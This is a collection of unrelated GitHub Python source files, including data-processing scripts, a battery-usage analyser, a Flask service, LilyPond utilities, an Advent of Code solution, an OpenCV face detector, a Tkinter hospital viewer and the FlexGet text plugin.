print(data['Entity'].iloc[i])\n# print(\"index2:\")\n# for i in index_2:\n## print(i)\n# print(data['Entity'].iloc[i])\n#\n#\n#getEntities(data, index_1, index_2)\n \n\n\n\ndef getEntitieCorNames(data, listOfCoordinates):\n one_one_list = []\n one_two_list = []\n two_two_list = []\n one_one_Entitylist = []\n one_two_Entitylist = []\n two_two_Entitylist = []\n entity = \"\"\n for p in listOfCoordinates:\n \n if(p[0]<=10 and p[1]<=10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1, p[1]-1, takeable = True)\n val = data[p[0]][p[1]]\n one_one_list.append(val) \n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n one_one_Entitylist.append(entity)\n elif(p[0]<=10 and p[1]>10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1, p[1]-1,takeable = True)\n val = data[p[0]][p[1]]\n one_two_list.append(val)\n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n one_two_Entitylist.append(entity)\n elif(p[0]>10 and p[1]>10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1,p[1]-1, takeable = True)\n val = data[p[0]][p[1]]\n two_two_list.append(val)\n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n two_two_Entitylist.append(entity)\n return one_one_list, one_two_list, two_two_list, one_one_Entitylist, one_two_Entitylist, two_two_Entitylist\n \n\n\none, two, three, onelist, twolist, threelist = getEntitieCorNames(my_data_clean, listOfCoordinates)\n\nd1 = {'Entities': onelist,'Values':one}\ndf1 = pd.DataFrame(d1)\n\nd2 = {'Entities': twolist,'Values':two}\ndf2 = pd.DataFrame(d2)\n\nd3 = {'Entities': threelist,'Values':three}\ndf3 = pd.DataFrame(d3)\n\n# Create a Pandas Excel writer using XlsxWriter as the engine.\nwriter = pd.ExcelWriter('D:/Geetha/Python_WS/Spyder_WS/Thesis_Evaluation/NER/HealthPSE.xlsx', engine='xlsxwriter')\n\n# Write each dataframe to a different worksheet.\ndf1.to_excel(writer, sheet_name='one-one')\ndf2.to_excel(writer, sheet_name='one-two')\ndf3.to_excel(writer, sheet_name='two-two')\n\n# Close the Pandas Excel writer and output the Excel file.\nwriter.save()\n\n","repo_name":"GeethR/Sensitive-Tweet-Classification-with-NER","sub_path":"FilterPSEValues.py","file_name":"FilterPSEValues.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16759411691","text":"\nimport os\nimport json\nimport time\nimport sqlite3\n\n# 每天每小时的平均耗电量(average_hour) = 当天sum耗电量 / 当天运行时间\n# 每周的平均每小时耗电量 = Sum(average_hour) / 7\n\n\n# 计算每天每小时平均耗电量\n\n# 1. 
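# FilterPSEValues.py above pairs np.where results with zip and deduplicates indices
# with a hand-written unique(); numpy covers both directly. A short equivalent on a
# toy matrix:
import numpy as np

m = np.array([[0.0, 0.3, 0.0],
              [0.7, 0.0, 0.0]])
coords = np.argwhere(m != 0)          # one (row, col) pair per non-zero cell
rows = np.unique(coords[:, 0])        # unique indices, already sorted
cols = np.unique(coords[:, 1])
print(coords.tolist(), rows.tolist(), cols.tolist())
# [[0, 1], [1, 0]] [0, 1] [0, 1]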
在运行时间的表里和详细耗电量表中, 以时间稍微晚点的时间戳为基准, 开始统计另外一张表中的数据\n# 统计电量和运行时间\n\npath = '../destination.PLSQL'\nif not os.path.exists(path):\n path = './destination.PLSQL'\nconnect = sqlite3.connect(path)\ncursor = connect.cursor()\n\n# 找出运行时间的数据 每小时一条数据\ncursor.execute('select * from PLAppTimeService_Aggregate_AppRunTime where BundleID like \"%movesx\" order by timestamp asc')\ntimeDataArray = []\nfor row in cursor:\n timeDataArray.append(row)\n\n# 找出详细电量的数据\ncursor.execute('select * from PLAccountingOperator_Aggregate_RootNodeEnergy where NodeID is 34012 and RootNodeID = 48 order by timestamp asc')\nenergyData = []\nfor row in cursor:\n energyData.append(row)\n\n# 保证统计时间再同一时间区间内\nbaseStartTimestamp = 0\nbaseEndTimestamp = 0\n\nsum_backgroundtime = 0\nsum_screentime = 0\nsum_energy = 0\n\ndayset = set()\n\n# 数据结果\nruntimeDictionary = {}\nenergyDictionary = {}\n\n\n# 确定结束节点\nif timeDataArray[-1][1] < energyData[-1][1]:\n baseEndTimestamp = timeDataArray[-1][1]\nelse:\n baseEndTimestamp = energyData[-1][1]\n\nif timeDataArray[0][1] <= energyData[0][1]:\n # 电量数据统计的较晚, 以电量的数据为基准开始统计运行时间数据\n baseStartTimestamp = energyData[0][1]\n for row in timeDataArray:\n if row[1] >= baseStartTimestamp and row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n runtimeDictionary[timeString] = []\n runtimeDictionary[timeString].append(row[-1] + row[-4])\n print(row[-4])\n print(row[-1])\n sum_screentime += row[-1]\n sum_backgroundtime += row[-4] \n # 计算电量时间\n dayset = set()\n for row in energyData:\n if row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n energyDictionary[timeString] = []\n energyDictionary[timeString].append(round(row[-3] / 1000,2))\n sum_energy += row[-3]\n print('aikesi--电量统计数据开始较晚') \nelse:\n # 运行时间数据统计的较晚, 以运行时间的数据为基准开始统计电量数据 \n baseStartTimestamp = timeDataArray[0][1]\n for row in energyData:\n if row[1] >= baseStartTimestamp and row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n energyDictionary[timeString] = []\n energyDictionary[timeString].append(round(row[-3] / 1000, 2))\n sum_energy += row[-3]\n dayset = set()\n # 计算运行时间\n for row in timeDataArray:\n if row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n runtimeDictionary[timeString] = []\n runtimeDictionary[timeString].append(row[-1] + row[-4])\n sum_screentime += row[-1]\n sum_backgroundtime += row[-4]\n print('aikesi--运行时间统计数据开始较晚')\n\nprint(sum_energy) # 2473427.0000119996\nprint(sum_screentime) #4562\nprint(sum_backgroundtime) #381959\n\n'''\n// 最终字典格式为:\n// 运行时间\n{'12-07':[23,456,777,5454],\n'12-08':[23,456,777,5454],\n'12-09':[23,456,777,5454],}\n\n// 耗电量\n{'12-07':[22,44,11,44],\n'12-08':[23,22,43,22],\n'12-09':[33,11,2,4],}\n'''\n\ntest = [runtimeDictionary, energyDictionary]\nstring = json.dumps(test)\nf = open('./test.json','w')\nf.write(string)\nf.close()\n\n# 计算平均时间\nseries = []\nfor key, value in (energyDictionary.items()):\n if key in runtimeDictionary.keys():\n # 运行时间 小时\n totalTime = 
sum(runtimeDictionary[key]) / 3600 \n        # 耗电量 mAh\n        energyArr = energyDictionary[key]\n        totalEnergy = sum(energyArr)\n        average = totalEnergy / totalTime\n        series.append(round(average,2))\n        print(key,average)\n\nnodeTime = '12-14' # 新v1版本时间节点\nsum_beforNodeTime = 0\nsum_afterNodeTime = 0\narraiveNode = 10000\njump = 0\nfor index,key in enumerate(sorted(runtimeDictionary.keys())):\n    if key not in energyDictionary.keys():\n        jump-=1\n        continue\n    x = index + jump\n    if key == nodeTime:\n        arraiveNode = x + 1\n    if x < arraiveNode and arraiveNode != 10000:\n        sum_beforNodeTime += series[x]\n    else:\n        sum_afterNodeTime += series[x]\nif arraiveNode == 10000:\n    arraiveNode = -1 \naverage_first_stage = sum_beforNodeTime / arraiveNode\naverage_second_stage = sum_afterNodeTime / (len(series) - 0)\ndata_average = [] \nfor x, v in enumerate(series):\n    if x < arraiveNode:\n        data_average.append(round(average_first_stage,2))\n    else:\n        data_average.append(round(average_second_stage,2)) \n\n# 计算每天的运行总时间\ntotalConsume = []\ntotalTime = []\n# 计算每天消耗的总电量\nfor k, v in energyDictionary.items():\n    totalConsume.append(round(sum(v),2))\n    if k in runtimeDictionary.keys():\n        totalTime.append(round((sum(runtimeDictionary[k]) / 3600),2))\n\n\noption_average = {}\noption_average['title'] = {'text':'平均每天每小时耗电量, 起止日期: %s 至 %s' % (sorted(dayset)[0],sorted(dayset)[-1]),\n                'textStyle':{'color':\"#FFF\",'width':'100%','height':'40px',},\n                'textAlign':'center',\n                'left':'50%',\n                'top':'20px'\n                } \noption_average['yAxis'] = [{'type':'value','name':'耗电量/小时(mAh)'}]\noption_average['xAxis'] = {'data':sorted(dayset),'name':'时间'}\noption_average['series'] = [{'type':'line','name':'平均每小时耗电量/天/mAh','data':series,'smooth':True},\n                    {'type':'line','name':'平均耗电量/mAh','data':data_average,'step':'middle','color':'red'}]\noption_average['dataZoom'] = [{'type':'inside'}]\noption_average['textStyle'] = {'color':'#ccc'}\noption_average['tooltip'] = {'trigger': 'axis'}\noption_average['legend'] = {'left':'10%','bottom':'10px','textStyle':{'color':'#aaa'}}\n\n# 当天平均每小时耗电量和 该阶段平均每小时耗电量\ndesPath = os.path.dirname(__file__) + '/average_hours.json'\nf = open(desPath,'w')\nf.write(json.dumps(option_average))\nf.close()\n\noption_average['title'] = {'text':'平均每天运行时长及耗电量, 起止日期: %s 至 %s' % (sorted(dayset)[0],sorted(dayset)[-1]),\n                'textStyle':{'color':\"#FFF\",'width':'100%','height':'40px',},\n                'textAlign':'center',\n                'left':'50%',\n                'top':'20px'\n                } \noption_average['yAxis'] = [{'type':'value','name':'耗电量/天(mAh)'},{'type':'value','name':'运行时间/小时'}]\noption_average['xAxis'] = {'data':sorted(dayset),'name':'时间'}\noption_average['series'] = [{'type':'line','name':'总消耗/mAh','data':totalConsume,'smooth':True} , \n                    {'type':'line','name':'总运行时间/h','data':totalTime,'smooth':True,'yAxisIndex':1}]\noption_average['dataZoom'] = [{'type':'inside'}]\noption_average['textStyle'] = {'color':'#ccc'}\noption_average['tooltip'] = {'trigger': 'axis'}\noption_average['legend'] = {'left':'10%','bottom':'10px','textStyle':{'color':'#aaa'}}\n\n# 总运行时间和总的耗电量\ndesPath = os.path.dirname(__file__) + '/totalRunTime.json'\nf = open(desPath,'w')\nf.write(json.dumps(option_average))\nf.close()","repo_name":"aikesi128/Document","sub_path":"iOS/iOS 项目/电量数据库解析/calculate_average.py","file_name":"calculate_average.py","file_ext":"py","file_size_in_byte":8417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}{"seq_id":"6639236387","text":"from app.main import db\nfrom app.main.models.quizset import Quizset\nfrom app.main.models.teacher import 
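# calculate_average.py above tracks per-day totals with nested dicts plus a manual
# day set; shaped as records, pandas collapses that bookkeeping into one groupby.
# The sample values below are invented purely for illustration:
import pandas as pd

rows = [("2020-12-07", 12.5, 0.8),
        ("2020-12-07", 9.0, 1.2),
        ("2020-12-08", 20.0, 2.0)]
df = pd.DataFrame(rows, columns=["day", "energy_mAh", "runtime_h"])
daily = df.groupby("day").sum()       # one row per day, columns summed
daily["mAh_per_hour"] = (daily["energy_mAh"] / daily["runtime_h"]).round(2)
print(daily)                          # 2020-12-07: 21.5 mAh / 2.0 h = 10.75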
Teacher\nfrom flask import jsonify\n\n\ndef publish_quiz(data):\n \"\"\"method to get all the quizset list to the model Quizset\n Args:\n data (dict): data which will be fetched from the quizset table\n using Quizset model\n Returns:\n dict, int: response object containing appropriate response based on the response from save changes,\n http response code specifying the success of getting data from table\n \"\"\"\n teacher = db.session.query(Teacher).filter_by(teacher_id=data['teacher_id']).first()\n if teacher:\n teacher_id = data['teacher_id']\n test_id = data['test_id']\n db.session.query(Quizset).filter_by(teacher_id=teacher_id).filter_by(\n test_id=test_id).update({Quizset.flag_publish_test: 1})\n db.session.commit()\n response_object = jsonify({\"response\": \"successfully Publish Quiz\"})\n return response_object, 200\n else:\n response_object = jsonify({\"response\": \"Authentication Required\"})\n return response_object, 407\n","repo_name":"masai-oss/quizera","sub_path":"src/server/app/main/services/publish_quiz.py","file_name":"publish_quiz.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13139519098","text":"from __future__ import unicode_literals\n\nimport ly.document\nimport ly.lex.lilypond\n\ndef replace_rest(cursor, replace_token):\n \"\"\"Replace full rests (r) with optional token. \"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Rest):\n if token == 'r':\n d[token.pos:token.end] = replace_token\n\ndef replace_fmrest(cursor, replace_token):\n \"\"\"Replace full measure rests (R) with optional token. \"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Rest):\n if token == 'R':\n d[token.pos:token.end] = replace_token\n\ndef replace_spacer(cursor, replace_token):\n \"\"\"Replace spacer rests (s) with optional token. \"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Spacer):\n d[token.pos:token.end] = replace_token\n\ndef replace_restcomm(cursor, replace_token):\n r\"\"\"Replace rests by rest command (\\rest) with optional token. 
\"\"\"\n\n def get_comm_rests(source):\n r\"\"\"Catch all rests by rest command (\\rest) from source.\"\"\"\n rest_tokens = None\n for token in source:\n if isinstance(token, ly.lex.lilypond.Note):\n rest_tokens = [token]\n continue\n if rest_tokens and isinstance(token, ly.lex.Space):\n rest_tokens.append(token)\n continue\n if rest_tokens and isinstance(token, ly.lex.lilypond.Command):\n if token == '\\\\rest':\n rest_tokens.append(token)\n yield rest_tokens\n rest_tokens = None\n \n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for rt in get_comm_rests(source):\n note = rt[0]\n space = rt[-2]\n comm = rt[-1]\n d[note.pos:note.end] = replace_token\n del d[space.pos:space.end]\n del d[comm.pos:comm.end]\n\n","repo_name":"frescobaldi/python-ly","sub_path":"ly/rests.py","file_name":"rests.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"9506641760","text":"from collections import deque\nimport re\n\n# read in the data\nwith open(\"PuzzleInputs/16\", \"r\") as f:\n\tdata = f.read()\n\nmoves = data.replace('\\n', '').split(',')\n\n#\n#\tPart 1\n#\n\n# returns a list of all the numbers found within string `s`\ndef get_all_nums(s):\n\treturn re.findall(\"[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?\", s)\n\n# generates the programs in their initial state\ndef generate_programs():\n\tprograms = []\n\tfor i in range(0, 16):\n\t\tprograms.append(chr(97 + i))\n\treturn programs\n\n# makes 'count' programs move from the end to the front, but maintain their order otherwise\ndef spin(programs, count):\n\titems = deque(programs)\n\titems.rotate(count)\n\treturn list(items)\n\n# makes the programs at positions `i` and `j` swap places\ndef exchange(programs, i, j):\n\ttemp = programs[i]\n\tprograms[i] = programs[j]\n\tprograms[j] = temp\n\n# makes the programs named `a` and `b` swap places\ndef partner(programs, a, b):\n\ti = programs.index(a)\n\tj = programs.index(b)\n\texchange(programs, i, j)\n\n# returns the programs' positions at the end of their dance(s)\ndef dance(moves, dances):\n\tprograms = generate_programs()\n\n\thistory = []\n\n\t# dance FOREVER\n\tfor i in range(0, dances):\n\t\t# if dancers were in this position in the past, found dance cycle\n\t\tpositions = ''.join(programs)\n\t\tif positions in history:\n\t\t\treturn history[dances % i]\n\t\thistory.append(positions)\n\n\t\t# haven't had these starting positions before, so do the moves\n\t\tfor move in moves:\n\t\t\t# spin - \"sX\"\n\t\t\tif move[:1] == 's':\n\t\t\t\tprograms = spin(programs, int(get_all_nums(move)[0]))\n\t\n\t\t\t# exchange - \"xA/B\"\n\t\t\tif move[:1] == 'x':\n\t\t\t\tnums = get_all_nums(move)\n\t\t\t\texchange(programs, int(nums[0]), int(nums[1]))\n\n\t\t\t# partner - \"pA/B\"\n\t\t\tif move[:1] == 'p':\n\t\t\t\tpartner(programs, list(move)[1], list(move)[3])\n\t\t\n\treturn ''.join(programs)\n\t\nlast_dance_position = dance(moves, 1)\nprint(last_dance_position)\n\n#\n#\tPart 2\n#\n\n# had to make use of memoization to properly solve this - and I shamelessly partook of some Reddit help to do so :P\nbillion_dances = dance(moves, 1000000000)\nprint(billion_dances)\n","repo_name":"goddtriffin/AdventOfCode-2017","sub_path":"day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13624690254","text":"import cv2\n\nkepala 
= cv2.CascadeClassifier('haar_frontal_detect.xml')\nmulut = cv2.CascadeClassifier('haar_mouth.xml')\nvideo_capture = cv2.VideoCapture(0)\n\nwhile True:\n\n # Capture frame-by-frame\n retval, frame = video_capture.read()\n\n # Convert to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect features specified in Haar Cascade\n deteksi_kepala = kepala.detectMultiScale(\n gray,\n scaleFactor=1.3,\n minNeighbors=5,\n minSize=(20, 20)\n )\n\n # Draw a rectangle around recognized faces \n total_kepala = 0\n for (x, y, w, h) in deteksi_kepala:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (200, 50, 50), 2)\n total_kepala = total_kepala + 1\n cv2.putText(frame, ('%02d_kepala Terdeteksi' % total_kepala), (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n \n # Detect features specified in Haar Cascade\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n deteksi_mulut = mulut.detectMultiScale(roi_gray)\n for (mx,my,mw,mh) in deteksi_mulut:\n cv2.rectangle(roi_color,(mx,my),(mx+mw,my+mh),(0,255,0),2)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"Muhamad-Rizaludin/Python-Face-detection-With-Frame-Opencv","sub_path":"frontal_detection.py","file_name":"frontal_detection.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15863606713","text":"import tkinter as tk\nimport mysql.connector\nfrom tkinter import ttk\nimport os\nimport sys\n\n# Connect to the database\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=os.environ['USER'],\n password=os.environ['PASS'],\n database=\"HOSPITAL\"\n)\nmycursor = mydb.cursor()\n\npatient_id = sys.argv[1]\nmycursor.execute(\"SELECT * from Patient where Patient_ID= %s\", (patient_id,))\npatient = mycursor.fetchone()\n\nmycursor.execute(\n \"SELECT sum(Bill_Amount) from Billing where Doctor_ID= %s\", (patient_id,))\namount = mycursor.fetchone()[0]\n\nmycursor.execute(\n \"SELECT * from Medical_History where Patient_ID= %s\", (patient_id,))\nappointments = mycursor.fetchall()\n# Get the column names\ncolumn_names = [i[0] for i in mycursor.description]\n\n# Calculate the maximum width of each column\nmax_widths = []\nfor i in range(len(column_names)):\n max_width = len(column_names[i])\n for result in appointments:\n if len(str(result[i])) > max_width:\n max_width = len(str(result[i]))\n max_widths.append(max_width)\n\n# Create the Tkinter window\nwindow = tk.Tk()\nwindow.title(\"Patient Information\")\n\n# Create the frame for the hospital name and number of doctors and nurses\nheader_frame = tk.Frame(window)\nheader_frame.pack(side=tk.TOP, fill=tk.X)\n\n# Create the label for the Patient Details\nhospital_name_label = tk.Label(\n header_frame, text=\"Patient Name: \" + patient[1], font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"DOB: \" + str(patient[3]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"Contact Number: \" + str(patient[2]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"Gender: \" + patient[4], font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, 
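# frontal_detection.py above nests mouth detection inside each face ROI of a webcam
# feed. A minimal still-image version of the same cascade pattern; cv2.data ships
# with the opencv-python wheels, so adjust the cascade path if your build differs:
import cv2

def detect_faces(image_path):
    cascade = cv2.CascadeClassifier(
        cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
    gray = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2GRAY)
    # Each hit is (x, y, w, h); raise minNeighbors to trade recall for precision.
    return cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)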
text=\"Insurance: \" + str(patient[5]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\n# Create the label for the number of nurses\nnum_nurses_label = tk.Label(\n header_frame, text=f\"Bill: {amount}\", font=(\"Ariel\", 14))\nnum_nurses_label.pack(side=tk.TOP)\n\n# Create the treeview\ntree = ttk.Treeview(window, columns=column_names, show=\"headings\")\n\n# Set the column headings from the department table\nfor col in column_names:\n tree.heading(col, text=col)\n\n# Set the column widths relative to the data\nfor i, width in enumerate(max_widths):\n tree.column(column_names[i], width=width*12)\n\n# Align the columns to the center\ntree.column(\"#0\", anchor=\"center\")\nfor col in column_names:\n tree.heading(col, anchor=\"center\")\n\n# Insert the data into the treeview\nfor result in appointments:\n tree.insert(\"\", tk.END, values=result)\n\n# Pack the treeview\ntree.pack(fill=\"both\", expand=True)\n\n# Function to retrieve data from the selected row and print it to the console\n\n\ndef print_selected_data(event):\n selected_row = tree.focus()\n selected_data = tree.item(selected_row)['values']\n # make a popup window with showing diagnosis and taking treatment from the diagnosis table\n diagnosis = selected_data[2]\n mycursor.execute(\n \"SELECT * from Diagnosis where Diagnosis= %s\", (diagnosis,))\n diagnosis_result = mycursor.fetchone()\n diagnosis = diagnosis_result[0]\n treatment = diagnosis_result[1]\n\n # create a popup window with the diagnosis and treatment\n popup = tk.Tk()\n popup.wm_title(\"Diagnosis\")\n popup.geometry(\"400x200\")\n\n label1 = ttk.Label(popup, text=\"Diagnosis:\", font=(\"Ariel\", 14))\n label1.pack(side=\"top\", pady=10)\n diagnosis_label = ttk.Label(popup, text=diagnosis, font=(\"Ariel\", 12))\n diagnosis_label.pack(side=\"top\", pady=10)\n\n label2 = ttk.Label(popup, text=\"Treatment:\", font=(\"Ariel\", 14))\n label2.pack(side=\"top\", pady=10)\n treatment_label = ttk.Label(popup, text=treatment, font=(\"Ariel\", 12))\n treatment_label.pack(side=\"top\", pady=10)\n\n B1 = ttk.Button(popup, text=\"Okay\", command=popup.withdraw)\n B1.pack(side=\"bottom\", pady=10)\n\n popup.mainloop()\n\n\n# Bind the on-click event to the treeview\ntree.bind(\"<>\", print_selected_data)\n\n# Start the Tkinter event loop\nwindow.mainloop()\n","repo_name":"Saksham0109/Hospital-Management-System","sub_path":"src/Patient_Dets.py","file_name":"Patient_Dets.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74480521473","text":"from random import randint\n\n\ninput(\"my message\") # str\nint(\"my string\") # int\n\nmyRand = randint(0, 100)\n\n\ni = 0\n\nwhile True :\n i += 1\n if i >= 10 :\n break\n stuff\n\nwhile i < 10 :\n stuff\n \n\n\n# 1 : the computer chooses a random number [0,100]\n# 2 : it asks a number INPUT\n# 3 : it checks the number [0,100]\n# if number > rand : \"less\"\n# elif number < rand : \"more\"\n# else : \"you won\" -> ends the program\n# 4 : go back to 2.","repo_name":"firgaty/python_tutorial","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"905272733","text":"\"\"\"Plugin for text file or URL feeds via regex.\"\"\"\nfrom __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport 
re\nimport logging\n\nimport path\n\nfrom flexget import plugin\nfrom flexget.entry import Entry\nfrom flexget.event import event\nfrom flexget.utils.cached_input import cached\n\nlog = logging.getLogger('text')\n\n\nclass Text(object):\n \"\"\"\n Parse any text for entries using regular expression.\n\n Example::\n\n url: \n entry:\n : \n format:\n : \n\n Note: each entry must have atleast two fields, title and url\n\n Example::\n\n text:\n url: http://www.nbc.com/Heroes/js/novels.js\n entry:\n title: novelTitle = \"(.*)\"\n url: novelPrint = \"(.*)\"\n format:\n url: http://www.nbc.com%(url)s\n \"\"\"\n schema = {\n 'type': 'object',\n 'properties': {\n 'url': {\n 'oneOf': [\n {'type': 'string', 'format': 'url'},\n {'type': 'string', 'format': 'file'}\n ]\n },\n 'encoding': {'type': 'string'},\n 'entry': {\n 'type': 'object',\n 'properties': {\n 'url': {'type': 'string', 'format': 'regex'},\n 'title': {'type': 'string', 'format': 'regex'}\n },\n 'additionalProperties': {'type': 'string', 'format': 'regex'},\n 'required': ['url', 'title']\n },\n 'format': {\n 'type': 'object',\n 'additionalProperties': {'type': 'string'}\n }\n },\n 'required': ['entry', 'url'],\n 'additonalProperties': False\n }\n\n def format_entry(self, entry, d):\n for k, v in d.items():\n entry[k] = v % entry\n\n @cached('text')\n @plugin.internet(log)\n def on_task_input(self, task, config):\n url = config['url']\n if '://' in url:\n lines = task.requests.get(url).text.split('\\n')\n else:\n lines = path.Path(url).lines(encoding=config.get('encoding', 'utf-8'))\n\n entry_config = config.get('entry')\n format_config = config.get('format', {})\n\n entries = []\n # keep track what fields have been found\n used = {}\n entry = Entry()\n\n # now parse text\n for line in lines:\n for field, regexp in entry_config.items():\n # log.debug('search field: %s regexp: %s' % (field, regexp))\n match = re.search(regexp, line)\n if match:\n # check if used field detected, in such case start with new entry\n if field in used:\n if entry.isvalid():\n log.info('Found field %s again before entry was completed. \\\n Adding current incomplete, but valid entry and moving to next.' % field)\n self.format_entry(entry, format_config)\n entries.append(entry)\n else:\n log.info('Invalid data, entry field %s is already found once. Ignoring entry.' 
% field)\n # start new entry\n entry = Entry()\n used = {}\n\n # add field to entry\n try:\n entry[field] = match.group(1)\n except IndexError:\n log.error('regex for field `%s` must contain a capture group' % field)\n raise plugin.PluginError('Your text plugin config contains errors, please correct them.')\n used[field] = True\n log.debug('found field: %s value: %s' % (field, entry[field]))\n\n # if all fields have been found\n if len(used) == len(entry_config):\n # check that entry has atleast title and url\n if not entry.isvalid():\n log.info('Invalid data, constructed entry is missing mandatory fields (title or url)')\n else:\n self.format_entry(entry, format_config)\n entries.append(entry)\n log.debug('Added entry %s' % entry)\n # start new entry\n entry = Entry()\n used = {}\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Text, 'text', api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/input/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31819255638","text":"import re\n\ns = input()\nsub_s = input()\n\n\ndef string_finder(sq, sub_sq):\n all_mats = []\n\n match = re.search(sub_sq, sq)\n\n if match is None:\n print('(-1, -1)')\n else:\n all_mats.append((match.start(), match.end()-1))\n x = match.start() + 1\n while match.start() != -1:\n # trim the strings\n new_match = re.search(sub_s, s[x:])\n if new_match is None:\n break\n if new_match.start() != -1:\n all_mats.append((new_match.start() + x, new_match.end() + x - 1))\n x += new_match.start() + 1\n\n\n for mat in all_mats:\n print(f'({mat[0]}, {mat[1]})')\n\n\nstring_finder(s, sub_s)\n","repo_name":"khushaal-nandwani/google-kickstart","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17887194252","text":"#https://stackoverflow.com/questions/14058340/adding-noise-to-a-signal-in-python\n\n# Signal Generation\n# matplotlib inline\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n#ejemplo de un vector de 11 elementos que empieza en cero y termina en 100\nt = np.linspace(0, 100, 11)\nprint(t)\n\ndef linspace_with_step(start, stop, step):\n elements = math.ceil((stop - start) / step) + 1\n return np.linspace(start, stop, elements)\n\nt = linspace_with_step(0, 10, 2)\nprint(t)\n\n\nt = np.linspace(1, 100, 1000)\nx_volts = 10*np.sin(t/(2*np.pi))\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 1\nplt.subplot(3,1,1)\nplt.plot(t, x_volts)\nplt.title('Signal')\nplt.ylabel('Voltage (V)')\nplt.xlabel('Time (s)')\n\nx_watts = x_volts ** 2\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 2\nplt.subplot(3,1,2)\nplt.plot(t, x_watts)\nplt.title('Signal Power')\nplt.ylabel('Power (W)')\nplt.xlabel('Time (s)')\n\nx_db = 10 * np.log10(x_watts)\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 3\nplt.subplot(3,1,3)\nplt.plot(t, x_db)\nplt.title('Signal Power in dB')\nplt.ylabel('Power (dB)')\nplt.xlabel('Time 